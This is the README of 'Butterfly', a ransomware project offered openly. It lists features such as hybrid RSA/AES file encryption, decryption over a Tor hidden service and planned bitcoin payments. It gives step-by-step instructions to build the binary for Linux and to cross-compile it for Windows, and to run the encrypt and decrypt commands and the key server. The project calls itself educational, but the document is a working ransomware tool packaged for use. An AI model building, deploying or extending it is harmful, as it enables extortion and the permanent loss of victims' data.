Butterfly is a cryptographic ransomware with the following features:
- Hybrid Encryption (RSA Asymmetric/AES Symmetric Encryption) ✔️
- Offline Encryption ✔️
- Supports multiple Operating Systems (Linux ✔️, Windows 🔄, MacOS ❌)
- Supports over 300 File Extensions ✔️
- Webserver bflyServerApp for a secure remote decryption ✔️
- Ransom Visualization with Browser ✔️ GUI ❌ Wallpaper ❌
- Decryption over a Tor Hidden Service ✔️
- Connection to the TOR Network ✔️
- Bitcoin Payments 🔄
Butterfly is a full-featured cryptographic ransomware application that irrevocably encrypts your data. This means careless
use leads to permanent data loss.
The main purpose of the butterfly project was to build knowledge about the increasing occurrence of ransomware.
❗ Butterfly was never supposed to harm or threaten other computers ❗
Install compilers for the toolchain
# GCC on Ubuntu
sudo apt-get install gcc g++
# Windows cross compiler for Ubuntu
sudo apt-get install mingw-w64
Install openssl and boost filesystem libraries
sudo apt-get install -y libssl-dev libboost-filesystem-dev
If you enable the logging definition with cmake, you also need to install the boost logging library
sudo apt-get install -y libboost-log-dev
# Clone the repo and create the build_linux/ folder
git clone https://github.com/bierschi/butterfly.git && cd butterfly
mkdir build_linux && cd build_linux
# Execute cmake with options
cmake -DCMAKE_TOOLCHAIN_FILE=../linux.cmake ../
(cmake -DCMAKE_TOOLCHAIN_FILE=../linux.cmake -DUNITTESTS=ON -DLOGGING=ON ../)
# Build the binary
make
CMake Arguments
-DUNITTESTS=ON # Enables the Unit Tests
-DLOGGING=ON # Enables the boost logging framework
# Clone the repo and create the build_windows/ folder
git clone https://github.com/bierschi/butterfly.git && cd butterfly
mkdir build_windows && cd build_windows
# Execute cmake with options
cmake -DCMAKE_TOOLCHAIN_FILE=../windows.cmake ../
# Build the binary
make
Print the available arguments for butterfly
./butterfly --help
butterfly is a cryptographic ransomware
Usage:
butterfly --dir /home/butterfly/data/
butterfly --dir /home/butterfly/data/ --protected
butterfly --encrypt /home/butterfly/data/
butterfly --decrypt /home/butterfly/data/
butterfly --decrypt /home/butterfly/data/ --tor
butterfly --decrypt /home/butterfly/data/ --key /home/butterfly/butterfly/masterkeys/SPrivateRSA.pem
Options:
-d, --dir Directory path to start the cryptographic ransomware (Encryption+Visualization+Payment+Decryption)
-enc, --encrypt Encrypts all files in provided directory path and shows the ransom visualization
-dec, --decrypt Decrypts all files in provided directory path, if the request to the remote server was successful
-t, --tor Remote decryption over the TOR network
-k, --key Masterkey for the decryption, if the remote server is not used (Corresponds to the embedded server public key)
-p, --protected Saves all key files to the system (For manual decryption)
-c, --config Logger config path
-v, --version Show version information and quit
-h, --help Show this message and quit
butterfly homepage at: https://github.com/bierschi/butterfly
# Run the bflyServerApp for remote decryption
bflyServerApp --host 127.0.0.1 --port 8080 --key ../masterkeys/SPrivateRSA.pem
# Run the butterfly binary with --dir argument
./butterfly --dir /home/butterfly/data/
# Use butterfly with the --encrypt argument
./butterfly --encrypt /home/butterfly/data
# Run the bflyServerApp for remote decryption
bflyServerApp --host 127.0.0.1 --port 8080 --key ../masterkeys/SPrivateRSA.pem
# Use butterfly with the --decrypt argument
./butterfly --decrypt /home/butterfly/data
Install GTest
sudo apt-get install libgtest-dev
cd /usr/src/gtest
sudo cmake CMakeLists.txt
sudo make
# Copy or symlink libgtest.a and libgtest_main.a to your /usr/lib folder
sudo cp *.a /usr/lib
Enable the Unit Tests with
cmake -DCMAKE_TOOLCHAIN_FILE=../linux.cmake -DUNITTESTS=ON ../
List all tests
./butterflyUnitTests --gtest_list_tests
Run the butterfly unit tests
./butterflyUnitTests
All changes and versioning information can be found in the CHANGELOG
Copyright (c) 2021 Bierschneider Christian. See LICENSE for details